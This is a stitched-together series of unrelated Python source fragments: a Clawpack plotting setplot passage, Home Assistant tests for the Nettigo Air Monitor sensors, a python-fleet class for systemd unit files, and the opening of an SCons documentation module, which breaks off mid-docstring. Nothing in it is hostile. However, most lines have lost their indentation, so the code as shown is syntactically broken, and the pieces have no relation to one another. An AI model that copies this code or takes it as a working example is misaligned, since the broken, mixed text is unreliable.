plotitem.plotstyle = 'b-'
plotitem.kwargs = {'linewidth':2}
# Plot topo as green curve:
plotitem = plotaxes.new_plotitem(plot_type='1d_plot')
plotitem.show = False
def gaugetopo(current_data):
q = current_data.q
h = q[0,:]
eta = q[3,:]
topo = eta - h
return topo
plotitem.plot_var = gaugetopo
plotitem.plotstyle = 'g-'
def add_zeroline(current_data):
from pylab import plot, legend, xticks, floor, xlim,ylim
t = current_data.t
#legend(('surface','topography'),loc='lower left')
plot(t, 0*t, 'k')
#n = int(floor(t.max()/1800.)) + 2
#xticks([1800*i for i in range(n)],[str(0.5*i) for i in range(n)])
#xlim(25000,t.max())
#ylim(-0.5,0.5)
print("+++ gaugeno = ",current_data.gaugeno)
def add_legend_eta(current_data):
from pylab import legend
        legend(['Surface'], loc='lower left')
add_zeroline(current_data)
plotaxes.ylimits = [-2.5, 2.5]
plotaxes.afteraxes = add_zeroline
plotfigure = plotdata.new_plotfigure(name='Velocities', figno=301, \
type='each_gauge')
plotfigure.clf_each_gauge = True
plotaxes = plotfigure.new_plotaxes()
#plotaxes.axescmd = 'subplot(2,1,2)'
plotaxes.title = 'Velocities'
plotaxes.afteraxes = add_zeroline
# Plot velocity as red curve:
plotitem = plotaxes.new_plotitem(plot_type='1d_plot')
plotitem.show = True
def speed(current_data):
from numpy import where, sqrt
h = current_data.q[0,:]
h = where(h>0.01, h, 1.e6)
u = 100. * current_data.q[1,:] / h
v = 100. * current_data.q[2,:] / h
s = sqrt(u**2 + v**2)
return s
plotitem.plot_var = speed
plotitem.plotstyle = 'k-'
plotitem = plotaxes.new_plotitem(plot_type='1d_plot')
def uvel(current_data):
from numpy import where, sqrt
h = current_data.q[0,:]
h = where(h>0.01, h, 1.e6)
u = 100. * current_data.q[1,:] / h
return u
plotitem.plot_var = uvel
plotitem.plotstyle = 'r-'
plotitem.kwargs = {'linewidth':2}
plotitem = plotaxes.new_plotitem(plot_type='1d_plot')
def vvel(current_data):
from numpy import where, sqrt
h = current_data.q[0,:]
h = where(h>0.01, h, 1.e6)
v = 100. * current_data.q[2,:] / h
return v
plotitem.plot_var = vvel
plotitem.plotstyle = 'g-'
plotitem.kwargs = {'linewidth':2}
def add_legend_vel(current_data):
from pylab import legend
# legend(["u","v"],'upper left')
legend(['Speed','uvel','vvel'],loc='upper left')
add_zeroline(current_data)
plotaxes.ylimits = [-50,50]
plotaxes.afteraxes = add_legend_vel
#-----------------------------------------
# Plots of timing (CPU and wall time):
def make_timing_plots(plotdata):
from clawpack.visclaw import plot_timing_stats
import os,sys
try:
timing_plotdir = plotdata.plotdir + '/_timing_figures'
os.system('mkdir -p %s' % timing_plotdir)
# adjust units for plots based on problem:
units = {'comptime':'seconds', 'simtime':'hours',
'cell':'millions'}
plot_timing_stats.make_plots(outdir=plotdata.outdir,
make_pngs=True,
plotdir=timing_plotdir,
units=units)
except:
print('*** Error making timing plots')
otherfigure = plotdata.new_otherfigure(name='timing plots',
fname='_timing_figures/timing.html')
otherfigure.makefig = make_timing_plots
#-----------------------------------------
# Parameters used only when creating html and/or latex hardcopy
# e.g., via clawpack.visclaw.frametools.printframes:
plotdata.printfigs = True # print figures
plotdata.print_format = 'png' # file format
plotdata.print_framenos = 'all' # list of frames to print
plotdata.print_gaugenos = 'all' # list of gauges to print
plotdata.print_fignos = [1,2,3,300,301] # list of figures to print
plotdata.html = True # create html files of plots?
plotdata.html_homelink = '../README.html' # pointer for top of index
plotdata.latex = False # create latex file of plots?
plotdata.latex_figsperline = 2 # layout of plots
plotdata.latex_framesperline = 1 # layout of plots
plotdata.latex_makepdf = False # also run pdflatex?
plotdata.parallel = False
return plotdata
if __name__=="__main__":
import matplotlib.pyplot as plt
plt.switch_backend('agg')
from clawpack.visclaw.plotclaw import plotclaw
plotclaw(outdir='.',setplot='setplot.py', plotdir='_plots',format='forestclaw')
|
|
"""Test sensor of Nettigo Air Monitor integration."""
from datetime import timedelta
from unittest.mock import AsyncMock, Mock, patch
from nettigo_air_monitor import ApiError
from homeassistant.components.nam.const import DOMAIN
from homeassistant.components.sensor import (
ATTR_STATE_CLASS,
DOMAIN as SENSOR_DOMAIN,
SensorDeviceClass,
SensorStateClass,
)
from homeassistant.const import (
ATTR_DEVICE_CLASS,
ATTR_ENTITY_ID,
ATTR_ICON,
ATTR_UNIT_OF_MEASUREMENT,
CONCENTRATION_MICROGRAMS_PER_CUBIC_METER,
CONCENTRATION_PARTS_PER_MILLION,
PERCENTAGE,
PRESSURE_HPA,
SIGNAL_STRENGTH_DECIBELS_MILLIWATT,
STATE_UNAVAILABLE,
TEMP_CELSIUS,
)
from homeassistant.helpers import entity_registry as er
from homeassistant.setup import async_setup_component
from homeassistant.util.dt import utcnow
from . import INCOMPLETE_NAM_DATA, nam_data
from tests.common import async_fire_time_changed
from tests.components.nam import init_integration
async def test_sensor(hass):
"""Test states of the air_quality."""
registry = er.async_get(hass)
registry.async_get_or_create(
SENSOR_DOMAIN,
DOMAIN,
"aa:bb:cc:dd:ee:ff-signal",
suggested_object_id="nettigo_air_monitor_signal_strength",
disabled_by=None,
)
registry.async_get_or_create(
SENSOR_DOMAIN,
DOMAIN,
"aa:bb:cc:dd:ee:ff-uptime",
suggested_object_id="nettigo_air_monitor_uptime",
disabled_by=None,
)
await init_integration(hass)
state = hass.states.get("sensor.nettigo_air_monitor_bme280_humidity")
assert state
assert state.state == "45.7"
assert state.attributes.get(ATTR_DEVICE_CLASS) == SensorDeviceClass.HUMIDITY
assert state.attributes.get(ATTR_STATE_CLASS) is SensorStateClass.MEASUREMENT
assert state.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == PERCENTAGE
entry = registry.async_get("sensor.nettigo_air_monitor_bme280_humidity")
assert entry
assert entry.unique_id == "aa:bb:cc:dd:ee:ff-bme280_humidity"
state = hass.states.get("sensor.nettigo_air_monitor_bme280_temperature")
assert state
assert state.state == "7.6"
assert state.attributes.get(ATTR_DEVICE_CLASS) == SensorDeviceClass.TEMPERATURE
assert state.attributes.get(ATTR_STATE_CLASS) is SensorStateClass.MEASUREMENT
assert state.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == TEMP_CELSIUS
entry = registry.async_get("sensor.nettigo_air_monitor_bme280_temperature")
assert entry
assert entry.unique_id == "aa:bb:cc:dd:ee:ff-bme280_temperature"
state = hass.states.get("sensor.nettigo_air_monitor_bme280_pressure")
assert state
assert state.state == "1011"
assert state.attributes.get(ATTR_DEVICE_CLASS) == SensorDeviceClass.PRESSURE
assert state.attributes.get(ATTR_STATE_CLASS) is SensorStateClass.MEASUREMENT
assert state.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == PRESSURE_HPA
entry = registry.async_get("sensor.nettigo_air_monitor_bme280_pressure")
assert entry
assert entry.unique_id == "aa:bb:cc:dd:ee:ff-bme280_pressure"
state = hass.states.get("sensor.nettigo_air_monitor_bmp180_temperature")
assert state
assert state.state == "7.6"
assert state.attributes.get(ATTR_DEVICE_CLASS) == SensorDeviceClass.TEMPERATURE
assert state.attributes.get(ATTR_STATE_CLASS) is SensorStateClass.MEASUREMENT
assert state.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == TEMP_CELSIUS
entry = registry.async_get("sensor.nettigo_air_monitor_bmp180_temperature")
assert entry
assert entry.unique_id == "aa:bb:cc:dd:ee:ff-bmp180_temperature"
state = hass.states.get("sensor.nettigo_air_monitor_bmp180_pressure")
assert state
assert state.state == "1032"
assert state.attributes.get(ATTR_DEVICE_CLASS) == SensorDeviceClass.PRESSURE
assert state.attributes.get(ATTR_STATE_CLASS) is SensorStateClass.MEASUREMENT
assert state.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == PRESSURE_HPA
entry = registry.async_get("sensor.nettigo_air_monitor_bmp180_pressure")
assert entry
assert entry.unique_id == "aa:bb:cc:dd:ee:ff-bmp180_pressure"
state = hass.states.get("sensor.nettigo_air_monitor_bmp280_temperature")
assert state
assert state.state == "5.6"
assert state.attributes.get(ATTR_DEVICE_CLASS) == SensorDeviceClass.TEMPERATURE
assert state.attributes.get(ATTR_STATE_CLASS) is SensorStateClass.MEASUREMENT
assert state.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == TEMP_CELSIUS
entry = registry.async_get("sensor.nettigo_air_monitor_bmp280_temperature")
assert entry
assert entry.unique_id == "aa:bb:cc:dd:ee:ff-bmp280_temperature"
state = hass.states.get("sensor.nettigo_air_monitor_bmp280_pressure")
assert state
assert state.state == "1022"
assert state.attributes.get(ATTR_DEVICE_CLASS) == SensorDeviceClass.PRESSURE
assert state.attributes.get(ATTR_STATE_CLASS) is SensorStateClass.MEASUREMENT
assert state.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == PRESSURE_HPA
entry = registry.async_get("sensor.nettigo_air_monitor_bmp280_pressure")
assert entry
assert entry.unique_id == "aa:bb:cc:dd:ee:ff-bmp280_pressure"
state = hass.states.get("sensor.nettigo_air_monitor_sht3x_humidity")
assert state
assert state.state == "34.7"
assert state.attributes.get(ATTR_DEVICE_CLASS) == SensorDeviceClass.HUMIDITY
assert state.attributes.get(ATTR_STATE_CLASS) is SensorStateClass.MEASUREMENT
assert state.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == PERCENTAGE
entry = registry.async_get("sensor.nettigo_air_monitor_sht3x_humidity")
assert entry
assert entry.unique_id == "aa:bb:cc:dd:ee:ff-sht3x_humidity"
state = hass.states.get("sensor.nettigo_air_monitor_sht3x_temperature")
assert state
assert state.state == "6.3"
assert state.attributes.get(ATTR_DEVICE_CLASS) == SensorDeviceClass.TEMPERATURE
assert state.attributes.get(ATTR_STATE_CLASS) is SensorStateClass.MEASUREMENT
assert state.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == TEMP_CELSIUS
entry = registry.async_get("sensor.nettigo_air_monitor_sht3x_temperature")
assert entry
assert entry.unique_id == "aa:bb:cc:dd:ee:ff-sht3x_temperature"
state = hass.states.get("sensor.nettigo_air_monitor_dht22_humidity")
assert state
assert state.state == "46.2"
assert state.attributes.get(ATTR_DEVICE_CLASS) == SensorDeviceClass.HUMIDITY
assert state.attributes.get(ATTR_STATE_CLASS) is SensorStateClass.MEASUREMENT
assert state.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == PERCENTAGE
entry = registry.async_get("sensor.nettigo_air_monitor_dht22_humidity")
assert entry
assert entry.unique_id == "aa:bb:cc:dd:ee:ff-dht22_humidity"
state = hass.states.get("sensor.nettigo_air_monitor_dht22_temperature")
assert state
assert state.state == "6.3"
assert state.attributes.get(ATTR_DEVICE_CLASS) == SensorDeviceClass.TEMPERATURE
assert state.attributes.get(ATTR_STATE_CLASS) is SensorStateClass.MEASUREMENT
assert state.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == TEMP_CELSIUS
entry = registry.async_get("sensor.nettigo_air_monitor_dht22_temperature")
assert entry
assert entry.unique_id == "aa:bb:cc:dd:ee:ff-dht22_temperature"
state = hass.states.get("sensor.nettigo_air_monitor_heca_humidity")
assert state
assert state.state == "50.0"
assert state.attributes.get(ATTR_DEVICE_CLASS) == SensorDeviceClass.HUMIDITY
assert state.attributes.get(ATTR_STATE_CLASS) is SensorStateClass.MEASUREMENT
assert state.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == PERCENTAGE
entry = registry.async_get("sensor.nettigo_air_monitor_heca_humidity")
assert entry
assert entry.unique_id == "aa:bb:cc:dd:ee:ff-heca_humidity"
state = hass.states.get("sensor.nettigo_air_monitor_heca_temperature")
assert state
assert state.state == "8.0"
assert state.attributes.get(ATTR_DEVICE_CLASS) == SensorDeviceClass.TEMPERATURE
assert state.attributes.get(ATTR_STATE_CLASS) is SensorStateClass.MEASUREMENT
assert state.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == TEMP_CELSIUS
entry = registry.async_get("sensor.nettigo_air_monitor_heca_temperature")
assert entry
assert entry.unique_id == "aa:bb:cc:dd:ee:ff-heca_temperature"
state = hass.states.get("sensor.nettigo_air_monitor_signal_strength")
assert state
assert state.state == "-72"
assert state.attributes.get(ATTR_DEVICE_CLASS) == SensorDeviceClass.SIGNAL_STRENGTH
assert state.attributes.get(ATTR_STATE_CLASS) is SensorStateClass.MEASUREMENT
assert (
state.attributes.get(ATTR_UNIT_OF_MEASUREMENT)
== SIGNAL_STRENGTH_DECIBELS_MILLIWATT
)
entry = registry.async_get("sensor.nettigo_air_monitor_signal_strength")
assert entry
assert entry.unique_id == "aa:bb:cc:dd:ee:ff-signal"
state = hass.states.get("sensor.nettigo_air_monitor_uptime")
assert state
assert (
state.state
== (utcnow() - timedelta(seconds=456987)).replace(microsecond=0).isoformat()
)
assert state.attributes.get(ATTR_DEVICE_CLASS) == SensorDeviceClass.TIMESTAMP
assert state.attributes.get(ATTR_STATE_CLASS) is None
entry = registry.async_get("sensor.nettigo_air_monitor_uptime")
assert entry
assert entry.unique_id == "aa:bb:cc:dd:ee:ff-uptime"
state = hass.states.get("sensor.nettigo_air_monitor_sds011_particulate_matter_10")
assert state
assert state.state == "19"
assert state.attributes.get(ATTR_DEVICE_CLASS) == SensorDeviceClass.PM10
assert state.attributes.get(ATTR_STATE_CLASS) is SensorStateClass.MEASUREMENT
assert (
state.attributes.get(ATTR_UNIT_OF_MEASUREMENT)
== CONCENTRATION_MICROGRAMS_PER_CUBIC_METER
)
entry = registry.async_get(
"sensor.nettigo_air_monitor_sds011_particulate_matter_10"
)
assert entry
assert entry.unique_id == "aa:bb:cc:dd:ee:ff-sds011_p1"
state = hass.states.get("sensor.nettigo_air_monitor_sds011_particulate_matter_2_5")
assert state
assert state.state == "11"
assert state.attributes.get(ATTR_DEVICE_CLASS) == SensorDeviceClass.PM25
assert state.attributes.get(ATTR_STATE_CLASS) is SensorStateClass.MEASUREMENT
assert (
state.attributes.get(ATTR_UNIT_OF_MEASUREMENT)
== CONCENTRATION_MICROGRAMS_PER_CUBIC_METER
)
entry = registry.async_get(
"sensor.nettigo_air_monitor_sds011_particulate_matter_2_5"
)
assert entry
assert entry.unique_id == "aa:bb:cc:dd:ee:ff-sds011_p2"
state = hass.states.get("sensor.nettigo_air_monitor_sps30_particulate_matter_1_0")
assert state
assert state.state == "31"
assert state.attributes.get(ATTR_DEVICE_CLASS) == SensorDeviceClass.PM1
assert state.attributes.get(ATTR_STATE_CLASS) is SensorStateClass.MEASUREMENT
assert (
state.attributes.get(ATTR_UNIT_OF_MEASUREMENT)
== CONCENTRATION_MICROGRAMS_PER_CUBIC_METER
)
entry = registry.async_get(
"sensor.nettigo_air_monitor_sps30_particulate_matter_1_0"
)
assert entry
assert entry.unique_id == "aa:bb:cc:dd:ee:ff-sps30_p0"
state = hass.states.get("sensor.nettigo_air_monitor_sps30_particulate_matter_10")
assert state
assert state.state == "21"
assert state.attributes.get(ATTR_DEVICE_CLASS) == SensorDeviceClass.PM10
assert state.attributes.get(ATTR_STATE_CLASS) is SensorStateClass.MEASUREMENT
assert (
state.attributes.get(ATTR_UNIT_OF_MEASUREMENT)
== CONCENTRATION_MICROGRAMS_PER_CUBIC_METER
)
entry = registry.async_get("sensor.nettigo_air_monitor_sps30_particulate_matter_10")
assert entry
assert entry.unique_id == "aa:bb:cc:dd:ee:ff-sps30_p1"
state = hass.states.get("sensor.nettigo_air_monitor_sps30_particulate_matter_2_5")
assert state
assert state.state == "34"
assert state.attributes.get(ATTR_DEVICE_CLASS) == SensorDeviceClass.PM25
assert state.attributes.get(ATTR_STATE_CLASS) is SensorStateClass.MEASUREMENT
assert (
state.attributes.get(ATTR_UNIT_OF_MEASUREMENT)
== CONCENTRATION_MICROGRAMS_PER_CUBIC_METER
)
entry = registry.async_get(
"sensor.nettigo_air_monitor_sps30_particulate_matter_2_5"
)
assert entry
assert entry.unique_id == "aa:bb:cc:dd:ee:ff-sps30_p2"
state = hass.states.get("sensor.nettigo_air_monitor_sps30_particulate_matter_4_0")
assert state
assert state.state == "25"
assert state.attributes.get(ATTR_STATE_CLASS) is SensorStateClass.MEASUREMENT
assert (
state.attributes.get(ATTR_UNIT_OF_MEASUREMENT)
== CONCENTRATION_MICROGRAMS_PER_CUBIC_METER
)
assert state.attributes.get(ATTR_ICON) == "mdi:molecule"
entry = registry.async_get(
"sensor.nettigo_air_monitor_sps30_particulate_matter_4_0"
)
assert entry
assert entry.unique_id == "aa:bb:cc:dd:ee:ff-sps30_p4"
state = hass.states.get("sensor.nettigo_air_monitor_mh_z14a_carbon_dioxide")
assert state
assert state.state == "865"
assert state.attributes.get(ATTR_DEVICE_CLASS) == SensorDeviceClass.CO2
assert state.attributes.get(ATTR_STATE_CLASS) is SensorStateClass.MEASUREMENT
assert (
state.attributes.get(ATTR_UNIT_OF_MEASUREMENT)
== CONCENTRATION_PARTS_PER_MILLION
)
entry = registry.async_get("sensor.nettigo_air_monitor_mh_z14a_carbon_dioxide")
assert entry
assert entry.unique_id == "aa:bb:cc:dd:ee:ff-mhz14a_carbon_dioxide"
async def test_sensor_disabled(hass):
"""Test sensor disabled by default."""
await init_integration(hass)
registry = er.async_get(hass)
entry = registry.async_get("sensor.nettigo_air_monitor_signal_strength")
assert entry
assert entry.unique_id == "aa:bb:cc:dd:ee:ff-signal"
assert entry.disabled
assert entry.disabled_by is er.RegistryEntryDisabler.INTEGRATION
# Test enabling entity
updated_entry = registry.async_update_entity(
entry.entity_id, **{"disabled_by": None}
)
assert updated_entry != entry
assert updated_entry.disabled is False
async def test_incomplete_data_after_device_restart(hass):
"""Test states of the air_quality after device restart."""
await init_integration(hass)
state = hass.states.get("sensor.nettigo_air_monitor_heca_temperature")
assert state
assert state.state == "8.0"
assert state.attributes.get(ATTR_DEVICE_CLASS) == SensorDeviceClass.TEMPERATURE
assert state.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == TEMP_CELSIUS
future = utcnow() + timedelta(minutes=6)
update_response = Mock(json=AsyncMock(return_value=INCOMPLETE_NAM_DATA))
with patch("homeassistant.components.nam.NettigoAirMonitor.initialize"), patch(
"homeassistant.components.nam.NettigoAirMonitor._async_http_request",
return_value=update_response,
):
async_fire_time_changed(hass, future)
await hass.async_block_till_done()
state = hass.states.get("sensor.nettigo_air_monitor_heca_temperature")
assert state
assert state.state == STATE_UNAVAILABLE
async def test_availability(hass):
"""Ensure that we mark the entities unavailable correctly when device causes an error."""
await init_integration(hass)
state = hass.states.get("sensor.nettigo_air_monitor_bme280_temperature")
assert state
assert state.state != STATE_UNAVAILABLE
assert state.state == "7.6"
future = utcnow() + timedelta(minutes=6)
with patch("homeassistant.components.nam.NettigoAirMonitor.initialize"), patch(
"homeassistant.components.nam.NettigoAirMonitor._async_http_request",
side_effect=ApiError("API Error"),
):
async_fire_time_changed(hass, future)
await hass.async_block_till_done()
state = hass.states.get("sensor.nettigo_air_monitor_bme280_temperature")
assert state
assert state.state == STATE_UNAVAILABLE
future = utcnow() + timedelta(minutes=12)
update_response = Mock(json=AsyncMock(return_value=nam_data))
with patch("homeassistant.components.nam.NettigoAirMonitor.initialize"), patch(
"homeassistant.components.nam.NettigoAirMonitor._async_http_request",
return_value=update_response,
):
async_fire_time_changed(hass, future)
await hass.async_block_till_done()
state = hass.states.get("sensor.nettigo_air_monitor_bme280_temperature")
assert state
assert state.state != STATE_UNAVAILABLE
assert state.state == "7.6"
async def test_manual_update_entity(hass):
"""Test manual update entity via service homeasasistant/update_entity."""
await init_integration(hass)
await async_setup_component(hass, "homeassistant", {})
update_response = Mock(json=AsyncMock(return_value=nam_data))
with patch("homeassistant.components.nam.NettigoAirMonitor.initialize"), patch(
"homeassistant.components.nam.NettigoAirMonitor._async_http_request",
return_value=update_response,
) as mock_get_data:
await hass.services.async_call(
"homeassistant",
"update_entity",
{ATTR_ENTITY_ID: ["sensor.nettigo_air_monitor_bme280_temperature"]},
blocking=True,
)
assert mock_get_data.call_count == 1
async def test_unique_id_migration(hass):
"""Test states of the unique_id migration."""
registry = er.async_get(hass)
registry.async_get_or_create(
SENSOR_DOMAIN,
DOMAIN,
"aa:bb:cc:dd:ee:ff-temperature",
suggested_object_id="nettigo_air_monitor_dht22_temperature",
disabled_by=None,
)
registry.async_get_or_create(
SENSOR_DOMAIN,
DOMAIN,
"aa:bb:cc:dd:ee:ff-humidity",
suggested_object_id="nettigo_air_monitor_dht22_humidity",
disabled_by=None,
)
await init_integration(hass)
entry = registry.async_get("sensor.nettigo_air_monitor_dht22_temperature")
assert entry
assert entry.unique_id == "aa:bb:cc:dd:ee:ff-dht22_temperature"
entry = registry.async_get("sensor.nettigo_air_monitor_dht22_humidity")
assert entry
assert entry.unique_id == "aa:bb:cc:dd:ee:ff-dht22_humidity"
|
|
from .fleet_object import FleetObject
try: # pragma: no cover
# python 2
from StringIO import StringIO
except ImportError: # pragma: no cover
# python 3
from io import StringIO
class Unit(FleetObject):
"""This object represents a Unit in Fleet
Create and modify Unit entities to communicate to fleet the desired state of the cluster.
This simply declares what should be happening; the backend system still has to react to the changes in
this desired state. The actual state of the system is communicated with UnitState entities.
Attributes (all are readonly):
Always available:
options (update with add_option, remove_option): list of UnitOption entities
desiredState: (update with set_desired_state): state the user wishes the Unit to be in
("inactive", "loaded", or "launched")
Available once units are submitted to fleet:
name: unique identifier of entity
currentState: state the Unit is currently in (same possible values as desiredState)
machineID: ID of machine to which the Unit is scheduled
A UnitOption represents a single option in a systemd unit file.
section: name of section that contains the option (e.g. "Unit", "Service", "Socket")
name: name of option (e.g. "BindsTo", "After", "ExecStart")
value: value of option (e.g. "/usr/bin/docker run busybox /bin/sleep 1000")
"""
_STATES = ['inactive', 'loaded', 'launched']
def __init__(self, client=None, data=None, desired_state=None, options=None, from_file=None, from_string=None):
"""Create a new unit
Args:
client (fleet.v1.Client, optional): The fleet client that retrieved this object
data (dict, optional): Initialize this object with this data. If this is used you must not
specify options, desired_state, from_file, or from_string
desired_state (string, optional): The desired_state for this object, defaults to 'launched' if not specified
If you do not specify data, You may specify one of the following args to initialize the object:
options (list, optional): A list of options to initialize the object with.
from_file (str, optional): Initialize this object from the unit file on disk at this path
from_string (str, optional): Initialize this object from the unit file in this string
If none are specified, an empty unit will be created
Raises:
IOError: from_file was specified and it does not exist
ValueError: Conflicting options, or The unit contents specified in from_string or from_file is not valid
"""
# make sure if they specify data, then they didn't specify anything else
if data and (desired_state or options or from_file or from_string):
            raise ValueError('If you specify data you can not specify desired_state, '
                             'options, from_file, or from_string')
# count how many of options, from_file, from_string we have
given = 0
for thing in [options, from_file, from_string]:
if thing:
given += 1
# we should only have one, if we have more, yell at them
if given > 1:
raise ValueError('You must specify only one of options, from_file, from_string')
# ensure we have a minimum structure if we aren't passed one
if data is None:
# we set this here, instead as a default value to the arg
# as we want to be able to check it vs data above, it should be None in that case
if desired_state is None:
desired_state = 'launched'
if options is None:
options = []
# Minimum structure required by fleet
data = {
'desiredState': desired_state,
'options': options
}
# Call the parent class to configure us
super(Unit, self).__init__(client=client, data=data)
        # If they asked us to load from a file, attempt to slurp it up
if from_file:
with open(from_file, 'r') as fh:
self._set_options_from_file(fh)
# If they asked us to load from a string, lie to the loader with StringIO
if from_string:
self._set_options_from_file(StringIO(from_string))
def __repr__(self):
return '<{0}: {1}>'.format(
self.__class__.__name__,
self.as_dict()
)
def __str__(self):
"""Generate a Unit file representation of this object"""
# build our output here
output = []
        # get a list of sections
sections = set([x['section'] for x in self._data['options']])
for section in sections:
# for each section, add it to our output
output.append(u'[{0}]'.format(section))
# iterate through the list of options, adding all items to this section
for option in self._data['options']:
if option['section'] == section:
output.append(u'{0}={1}'.format(option['name'], option['value']))
# join and return the output
return u"\n".join(output)
def _set_options_from_file(self, file_handle):
"""Parses a unit file and updates self._data['options']
Args:
file_handle (file): a file-like object (supporting read()) containing a unit
Returns:
            True: The file was successfully parsed and options were updated
Raises:
IOError: from_file was specified and it does not exist
ValueError: The unit contents specified in from_string or from_file is not valid
"""
# TODO: Find a library to handle this unit file parsing
# Can't use configparser, it doesn't handle multiple entries for the same key in the same section
# This is terribly naive
# build our output here
options = []
# keep track of line numbers to report when parsing problems happen
line_number = 0
# the section we are currently in
section = None
for line in file_handle.read().splitlines():
line_number += 1
# clear any extra white space
orig_line = line
line = line.strip()
# ignore comments, and blank lines
if not line or line.startswith('#'):
continue
# is this a section header? If so, update our variable and continue
# Section headers look like: [Section]
if line.startswith('[') and line.endswith(']'):
section = line.strip('[]')
continue
# We encountered a non blank line outside of a section, this is a problem
if not section:
raise ValueError(
'Unable to parse unit file; '
                    'Unexpected line outside of a section: {0} (line: {1})'.format(
line,
line_number
))
# Attempt to parse a line inside a section
# Lines should look like: name=value \
# continuation
continuation = False
try:
# if the previous value ends with \ then we are a continuation
# so remove the \, and set the flag so we'll append to this below
if options[-1]['value'].endswith('\\'):
options[-1]['value'] = options[-1]['value'][:-1]
continuation = True
except IndexError:
pass
try:
# if we are a continuation, then just append our value to the previous line
if continuation:
options[-1]['value'] += orig_line
continue
                # else we are a normal line, so split and get our name / value
name, value = line.split('=', 1)
options.append({
'section': section,
'name': name,
'value': value
})
except ValueError:
raise ValueError(
'Unable to parse unit file; '
'Malformed line in section {0}: {1} (line: {2})'.format(
section,
line,
line_number
))
# update our internal structure
self._data['options'] = options
return True
def _is_live(self):
"""Checks to see if this unit came from fleet, or was created locally
        Only units with a .name property (set by the server) and a _client property are considered 'live'
Returns:
True: The object is live
False: The object is not
"""
if 'name' in self._data and self._client:
return True
return False
def add_option(self, section, name, value):
"""Add an option to a section of the unit file
Args:
section (str): The name of the section, If it doesn't exist it will be created
name (str): The name of the option to add
value (str): The value of the option
Returns:
True: The item was added
"""
# Don't allow updating units we loaded from fleet, it's not supported
if self._is_live():
raise RuntimeError('Submitted units cannot update their options')
option = {
'section': section,
'name': name,
'value': value
}
self._data['options'].append(option)
return True
def remove_option(self, section, name, value=None):
"""Remove an option from a unit
Args:
section (str): The section to remove from.
name (str): The item to remove.
value (str, optional): If specified, only the option matching this value will be removed
If not specified, all options with ``name`` in ``section`` will be removed
Returns:
True: At least one item was removed
False: The item requested to remove was not found
"""
# Don't allow updating units we loaded from fleet, it's not supported
if self._is_live():
raise RuntimeError('Submitted units cannot update their options')
removed = 0
# iterate through a copy of the options
for option in list(self._data['options']):
# if it's in our section
if option['section'] == section:
# and it matches our name
if option['name'] == name:
                    # and they didn't give us a value, or it matches
if value is None or option['value'] == value:
# nuke it from the source
self._data['options'].remove(option)
removed += 1
if removed > 0:
return True
return False
def destroy(self):
"""Remove a unit from the fleet cluster
Returns:
True: The unit was removed
Raises:
fleet.v1.errors.APIError: Fleet returned a response code >= 400
"""
# if this unit didn't come from fleet, we can't destroy it
if not self._is_live():
            raise RuntimeError('A unit must be submitted to fleet before it can be destroyed.')
return self._client.destroy_unit(self.name)
def set_desired_state(self, state):
"""Update the desired state of a unit.
Args:
state (str): The desired state for the unit, must be one of ``_STATES``
Returns:
str: The updated state
Raises:
fleet.v1.errors.APIError: Fleet returned a response code >= 400
ValueError: An invalid value for ``state`` was provided
"""
if state not in self._STATES:
raise ValueError(
'state must be one of: {0}'.format(
self._STATES
))
# update our internal structure
self._data['desiredState'] = state
# if we have a name, then we came from the server
# and we have a handle to an active client
# Then update our selves on the server
if self._is_live():
self._update('_data', self._client.set_unit_desired_state(self.name, self.desiredState))
# Return the state
return self._data['desiredState']
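# Illustrative sketch (not part of the original module): building a Unit locally
# from a unit-file string and editing it before submission. The service content
# below is made up for the example.
def _example_unit():  # pragma: no cover
    unit = Unit(from_string=(
        '[Unit]\n'
        'Description=Example sleeper\n'
        '[Service]\n'
        'ExecStart=/usr/bin/sleep 1000\n'
    ))
    # Local (not yet submitted) units may still be edited and re-serialized.
    unit.add_option('Service', 'Restart', 'always')
    unit.set_desired_state('loaded')  # must be one of Unit._STATES
    return str(unit)                  # renders back to unit-file text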
|
|
#!/usr/bin/env python
#
# Module for handling SCons documentation processing.
#
__doc__ = """
This module parses home-brew XML files that document various things
in SCons. Right now, it handles Builders, functions, construction
variables, and Tools, but we expect it to get extended in the future.
In general, you can use any DocBook tag in the input, and this module
just adds processing various home-brew tags to try to make life a
little easier.
Builder example:
<builder name="BUILDER">
<summary>
This is the summary description of an SCons Builder.
It will get placed in the man page,
and in the appropriate User's Guide appendix.
The name of any builder may be interpolated
anywhere in the document by specifying the
&b-BUILDER;
element. It need not be on a line by itself.
Unlike normal XML, blank lines are significant in these
descriptions and serve to separate paragraphs.
They'll get replaced in DocBook output with appropriate tags
to indicate a new paragraph.
<example>
print "this is example code, it will be offset and indented"
</example>
</summary>
</builder>
Function example:
<scons_function name="FUNCTION">
<arguments>
(arg1, arg2, key=value)
</arguments>
<summary>
This is the summary description of an SCons function.
It will get placed in the man page,
and in the appropriate User's Guide appendix.
The name of any builder may be interpolated
anywhere in the document by specifying the
&f-FUNCTION;
element. It need not be on a line by itself.
Unlike normal XML, blank lines are significant in these
descriptions and serve to separate paragraphs.
They'll get replaced in DocBook output with appropriate tags
to indicate a new paragraph.
<example>
print "this is example code, it will be offset and indented"
</example>
</summary>
</scons_function>
Construction variable example:
<cvar name="VARIABLE">
<summary>
This is the summary description of a construction variable.
It will get placed in the man page,
and in the appropriate User's Guide appendix.
The name of any construction variable may be interpolated
anywhere in the document by specifying the
&t-VARIABLE;
element. It need not be on a line by itself.
Unlike normal XML, blank lines are significant in these
descriptions and serve to separate paragraphs.
They'll get replaced in DocBook output with appropriate tags
to indicate a new paragraph.
<example>
print "this is example code, it will be offset and indented"
</example>
</summary>
</cvar>
Tool example:
<tool name="TOOL">
<summary>
This is the summary description of an SCons Tool.
It will get placed in the man page,
and in the appropriate User's Guide appendix.
The name of any tool may be interpolated
anywhere in the document by specifying the
&t-TOOL;
element. It need not be on a line by itself.
Unlike normal XML, blank lines are significant in these
descriptions and serve to separate paragraphs.
